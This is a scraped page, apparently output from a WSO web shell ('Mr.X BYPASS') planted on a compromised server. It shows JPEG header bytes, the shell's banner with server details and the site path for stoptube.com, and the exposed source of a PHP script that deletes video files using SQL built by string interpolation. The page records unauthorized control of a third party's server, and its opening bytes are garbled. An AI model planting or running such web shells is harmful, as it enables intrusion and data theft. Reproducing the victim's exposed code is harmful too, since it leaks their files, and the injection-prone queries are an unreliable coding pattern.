����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-09 09:51:02 1999.30 GB Free: 74.00 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?
//deletes mobile versions of all videos
include_once('db.php');
$result = dbQuery("SELECT * FROM content WHERE mobile != ''",false);
foreach($result as $row) {
echo "Processing $row[record_num]\n";
$first = $row['filename'][0];
$second = $row['filename'][1];
$third = $row['filename'][2];
$forth = $row['filename'][3];
$fifth = $row['filename'][4];
$subdir = $first.'/'.$second.'/'.$third.'/'.$forth.'/'.$fifth.'/';
$mobFile = $row['mobile'];
$filepath = "$video_path/$subdir".$mobFile;
if(is_file($filepath)) {
if(unlink($filepath)) {
dbQuery("UPDATE content SET mobile = '' WHERE record_num = '$row[record_num]'");
}
}
}
exit("Done");